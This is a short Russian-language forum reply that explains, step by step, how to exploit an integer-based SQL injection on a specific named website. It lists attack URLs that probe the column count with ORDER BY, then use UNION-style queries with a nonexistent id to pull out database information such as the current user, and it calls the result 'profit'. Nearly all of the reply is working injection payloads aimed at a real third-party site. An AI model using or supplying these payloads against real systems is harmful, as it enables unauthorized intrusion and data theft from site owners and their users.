В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.

http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE

http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE

http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+ - TRUE

Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные

http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+

профит

http://herorace.ru/news-full.php?id=...4,user(),6+--+

не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть